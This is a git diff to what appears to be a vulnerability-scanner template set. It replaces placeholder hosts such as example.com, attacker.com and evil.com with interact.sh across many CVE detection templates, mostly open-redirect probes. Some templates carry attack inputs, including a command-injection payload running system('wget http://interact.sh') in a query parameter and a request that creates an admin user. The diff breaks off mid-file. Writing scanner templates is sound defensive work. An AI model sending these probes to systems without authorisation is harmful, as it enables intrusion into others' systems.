diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml
index 53060c8ed3..c4f1e581a5 100644
--- a/cves/2009/CVE-2009-5020.yaml
+++ b/cves/2009/CVE-2009-5020.yaml
@@ -19,13 +19,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
+ - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
+ - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13
diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml
index bb7040e1d4..88d17c92a9 100644
--- a/cves/2013/CVE-2013-2248.yaml
+++ b/cves/2013/CVE-2013-2248.yaml
@@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/index.action?redirect:http://www.example.com/"
+ - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/02/21
diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml
index 27037cadac..a50ed20d70 100644
--- a/cves/2014/CVE-2014-9617.yaml
+++ b/cves/2014/CVE-2014-9617.yaml
@@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
+ - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25
diff --git a/cves/2015/CVE-2015-5354.yaml b/cves/2015/CVE-2015-5354.yaml
index 9ab1da69ac..42b45db3e3 100644
--- a/cves/2015/CVE-2015-5354.yaml
+++ b/cves/2015/CVE-2015-5354.yaml
@@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com'
+ - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2015/CVE-2015-5461.yaml b/cves/2015/CVE-2015-5461.yaml
index 37fe790d57..70deccfb6e 100644
--- a/cves/2015/CVE-2015-5461.yaml
+++ b/cves/2015/CVE-2015-5461.yaml
@@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
+ - "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2015/CVE-2015-7823.yaml b/cves/2015/CVE-2015-7823.yaml
index 78174bdbb0..1f595d4edf 100644
--- a/cves/2015/CVE-2015-7823.yaml
+++ b/cves/2015/CVE-2015-7823.yaml
@@ -16,10 +16,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
+ - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2016/CVE-2016-3978.yaml b/cves/2016/CVE-2016-3978.yaml
index 601462cf16..31ea2c13be 100644
--- a/cves/2016/CVE-2016-3978.yaml
+++ b/cves/2016/CVE-2016-3978.yaml
@@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/login?redir=http://www.example.com'
+ - '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml
index 760d49e6a1..8ac82d2d67 100644
--- a/cves/2017/CVE-2017-10271.yaml
+++ b/cves/2017/CVE-2017-10271.yaml
@@ -42,7 +42,7 @@ requests:
-c
- example.com
+ interact.sh
diff --git a/cves/2017/CVE-2017-12138.yaml b/cves/2017/CVE-2017-12138.yaml
index f8205c321b..2931b0c317 100644
--- a/cves/2017/CVE-2017-12138.yaml
+++ b/cves/2017/CVE-2017-12138.yaml
@@ -26,7 +26,7 @@ requests:
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- |
- GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
+ GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@@ -34,4 +34,4 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml
index b0ea8cdf0b..8b9c4aefb0 100644
--- a/cves/2017/CVE-2017-3528.yaml
+++ b/cves/2017/CVE-2017-3528.yaml
@@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
+ - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers:
- type: word
words:
- - 'noresize src="/\example.com?configName='
+ - 'noresize src="/\interact.sh?configName='
part: body
# Enhanced by mp on 2022/04/14
diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml
index 371917e082..89b12d36fe 100644
--- a/cves/2018/CVE-2018-11784.yaml
+++ b/cves/2018/CVE-2018-11784.yaml
@@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}//example.com"
+ - "{{BaseURL}}//interact.sh"
matchers:
- type: regex
regex:
- - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
+ - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
part: header
# Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml
index c1d638cc99..300570d436 100644
--- a/cves/2018/CVE-2018-12300.yaml
+++ b/cves/2018/CVE-2018-12300.yaml
@@ -19,10 +19,10 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
+ - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-12675.yaml b/cves/2018/CVE-2018-12675.yaml
index 2a10a92033..b2311e0466 100644
--- a/cves/2018/CVE-2018-12675.yaml
+++ b/cves/2018/CVE-2018-12675.yaml
@@ -23,10 +23,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com'
+ - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
matchers:
- type: word
part: body
words:
- - ''
+ - ''
diff --git a/cves/2018/CVE-2018-14474.yaml b/cves/2018/CVE-2018-14474.yaml
index 3264d6fa9c..a120704c60 100644
--- a/cves/2018/CVE-2018-14474.yaml
+++ b/cves/2018/CVE-2018-14474.yaml
@@ -21,12 +21,12 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/login?next=http://attacker.com/?app.scan/'
- - '{{BaseURL}}/signup?next=http://attacker.com/?app.scan/'
+ - '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
+ - '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-14574.yaml b/cves/2018/CVE-2018-14574.yaml
index 1ae3602c19..0a5fad2968 100644
--- a/cves/2018/CVE-2018-14574.yaml
+++ b/cves/2018/CVE-2018-14574.yaml
@@ -22,7 +22,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}//www.example.com"
+ - "{{BaseURL}}//www.interact.sh"
matchers-condition: and
matchers:
@@ -31,6 +31,6 @@ requests:
- 301
- type: word
words:
- - "Location: https://www.example.com"
- - "Location: http://www.example.com"
+ - "Location: https://www.interact.sh"
+ - "Location: http://www.interact.sh"
part: header
diff --git a/cves/2018/CVE-2018-14931.yaml b/cves/2018/CVE-2018-14931.yaml
index babdd309c5..884a14b46c 100644
--- a/cves/2018/CVE-2018-14931.yaml
+++ b/cves/2018/CVE-2018-14931.yaml
@@ -19,12 +19,12 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
+ - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/26
diff --git a/cves/2018/CVE-2018-16761.yaml b/cves/2018/CVE-2018-16761.yaml
index 147ab0b9d1..ec40ee117f 100644
--- a/cves/2018/CVE-2018-16761.yaml
+++ b/cves/2018/CVE-2018-16761.yaml
@@ -21,12 +21,12 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/select_project.php?url=http://attacker.com'
- - '{{BaseURL}}/clock_status.php?current_page=http://attacker.com'
+ - '{{BaseURL}}/select_project.php?url=http://interact.sh'
+ - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml
index e9c70f056b..02d8bd123f 100644
--- a/cves/2018/CVE-2018-17422.yaml
+++ b/cves/2018/CVE-2018-17422.yaml
@@ -22,8 +22,8 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com'
- - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com'
+ - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
+ - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
stop-at-first-match: true
matchers-condition: and
@@ -32,7 +32,7 @@ requests:
- type: word
part: body
words:
- - "self.location = 'http://www.example.com'"
+ - "self.location = 'http://www.interact.sh'"
- type: status
status:
diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml
index ce3dce57f2..b4df959f48 100644
--- a/cves/2018/CVE-2018-3167.yaml
+++ b/cves/2018/CVE-2018-3167.yaml
@@ -20,7 +20,7 @@ requests:
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
- body:
+ body:
matchers-condition: and
matchers:
diff --git a/cves/2018/CVE-2018-6200.yaml b/cves/2018/CVE-2018-6200.yaml
index 87bd8ef42a..3ef39cbffe 100644
--- a/cves/2018/CVE-2018-6200.yaml
+++ b/cves/2018/CVE-2018-6200.yaml
@@ -21,8 +21,8 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/redirector.php?url=https://attacker.com'
- - '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com'
+ - '{{BaseURL}}/redirector.php?url=https://interact.sh'
+ - '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
matchers-condition: and
matchers:
@@ -30,7 +30,7 @@ requests:
- type: word
part: body
words:
- - ''
+ - ''
- type: status
status:
diff --git a/cves/2019/CVE-2019-1010290.yaml b/cves/2019/CVE-2019-1010290.yaml
index 24fe7c97df..36da70ab7c 100644
--- a/cves/2019/CVE-2019-1010290.yaml
+++ b/cves/2019/CVE-2019-1010290.yaml
@@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
+ - '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml
index b2780cf573..52999cd8cd 100644
--- a/cves/2019/CVE-2019-14223.yaml
+++ b/cves/2019/CVE-2019-14223.yaml
@@ -25,10 +25,10 @@ requests:
Content-Type: application/x-www-form-urlencoded
body: |
- success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
+ success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
matchers:
- type: regex
part: header
regex:
- - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
\ No newline at end of file
+ - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
\ No newline at end of file
diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml
index fce4ffdd64..ed12c1a447 100644
--- a/cves/2019/CVE-2019-16097.yaml
+++ b/cves/2019/CVE-2019-16097.yaml
@@ -25,7 +25,7 @@ requests:
headers:
Content-Type: application/json
body: |
- {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
+ {"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
matchers-condition: and
matchers:
diff --git a/cves/2019/CVE-2019-3912.yaml b/cves/2019/CVE-2019-3912.yaml
index b827b04270..48ffb51ea7 100644
--- a/cves/2019/CVE-2019-3912.yaml
+++ b/cves/2019/CVE-2019-3912.yaml
@@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
+ - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml
index 26ef262b5d..c865445f3f 100644
--- a/cves/2019/CVE-2019-7275.yaml
+++ b/cves/2019/CVE-2019-7275.yaml
@@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/updating.jsp?url=https://example.com/"
+ - "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index ea6ce7dd2f..fa1e54195e 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -21,13 +21,13 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/index.php?redirect=/\/evil.com/'
- - '{{BaseURL}}/index.php?redirect=//evil.com'
+ - '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
+ - '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by mp on 2022/05/04
diff --git a/cves/2020/CVE-2020-11529.yaml b/cves/2020/CVE-2020-11529.yaml
index 02c6e86d2e..9d9059661f 100644
--- a/cves/2020/CVE-2020-11529.yaml
+++ b/cves/2020/CVE-2020-11529.yaml
@@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
+ - '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
part: header
# Enhanced by mp on 2022/05/04
diff --git a/cves/2020/CVE-2020-13945.yaml b/cves/2020/CVE-2020-13945.yaml
index 3247e37750..6c740884d6 100644
--- a/cves/2020/CVE-2020-13945.yaml
+++ b/cves/2020/CVE-2020-13945.yaml
@@ -30,7 +30,7 @@ requests:
"upstream":{
"type":"roundrobin",
"nodes":{
- "example.com:80":1
+ "interact.sh:80":1
}
}
}
diff --git a/cves/2020/CVE-2020-18268.yaml b/cves/2020/CVE-2020-18268.yaml
index ed603d9e0d..30e754c8d8 100644
--- a/cves/2020/CVE-2020-18268.yaml
+++ b/cves/2020/CVE-2020-18268.yaml
@@ -28,7 +28,7 @@ requests:
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
- GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
+ GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
Host: {{Hostname}}
cookie-reuse: true
@@ -36,4 +36,4 @@ requests:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml
index a642e28b21..2f482a573b 100644
--- a/cves/2020/CVE-2020-22840.yaml
+++ b/cves/2020/CVE-2020-22840.yaml
@@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
+ - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
diff --git a/cves/2020/CVE-2020-23015.yaml b/cves/2020/CVE-2020-23015.yaml
index 97f4de8c09..a718da52a7 100644
--- a/cves/2020/CVE-2020-23015.yaml
+++ b/cves/2020/CVE-2020-23015.yaml
@@ -19,10 +19,10 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/?url=http://example.com'
+ - '{{BaseURL}}/?url=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
\ No newline at end of file
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml
index b7eecbd3ea..344189257f 100644
--- a/cves/2020/CVE-2020-24550.yaml
+++ b/cves/2020/CVE-2020-24550.yaml
@@ -17,14 +17,14 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
+ - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
matchers-condition: and
matchers:
- type: word
part: header
words:
- - "Location: https://example.com"
+ - "Location: https://interact.sh"
- type: status
status:
diff --git a/cves/2020/CVE-2020-35476.yaml b/cves/2020/CVE-2020-35476.yaml
index 89376f3904..88c9505ec1 100644
--- a/cves/2020/CVE-2020-35476.yaml
+++ b/cves/2020/CVE-2020-35476.yaml
@@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
+ - "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status
diff --git a/cves/2020/CVE-2020-36365.yaml b/cves/2020/CVE-2020-36365.yaml
index 7780f22248..1d16630c70 100644
--- a/cves/2020/CVE-2020-36365.yaml
+++ b/cves/2020/CVE-2020-36365.yaml
@@ -22,10 +22,10 @@ requests:
- method: GET
path:
- - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
+ - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/cves/2021/CVE-2021-21311.yaml b/cves/2021/CVE-2021-21311.yaml
index 70383a0a9d..afdd2b40ee 100644
--- a/cves/2021/CVE-2021-21311.yaml
+++ b/cves/2021/CVE-2021-21311.yaml
@@ -21,7 +21,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/adminer?elastic=example.com&username="
+ - "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and
matchers:
diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml
index 03a4cdb928..da5eb9ac90 100644
--- a/cves/2021/CVE-2021-21389.yaml
+++ b/cves/2021/CVE-2021-21389.yaml
@@ -28,7 +28,7 @@ requests:
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
- "user_email":"{{randstr}}@example.com"
+ "user_email":"{{randstr}}@interact.sh"
}
matchers-condition: and
diff --git a/cves/2021/CVE-2021-21745.yaml b/cves/2021/CVE-2021-21745.yaml
index 65de258715..867df640ad 100644
--- a/cves/2021/CVE-2021-21745.yaml
+++ b/cves/2021/CVE-2021-21745.yaml
@@ -23,7 +23,7 @@ requests:
- |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}}
- Referer: http://evil.com/127.0.0.1.html
+ Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and
matchers:
diff --git a/cves/2021/CVE-2021-22054.yaml b/cves/2021/CVE-2021-22054.yaml
index a2e515f8d3..03ec978fa0 100644
--- a/cves/2021/CVE-2021-22054.yaml
+++ b/cves/2021/CVE-2021-22054.yaml
@@ -31,4 +31,4 @@ requests:
- type: word
words:
- - "
Example Domain"
+ - " Interactsh Server
"
diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml
index fa16b73f67..afd1efd5cb 100644
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
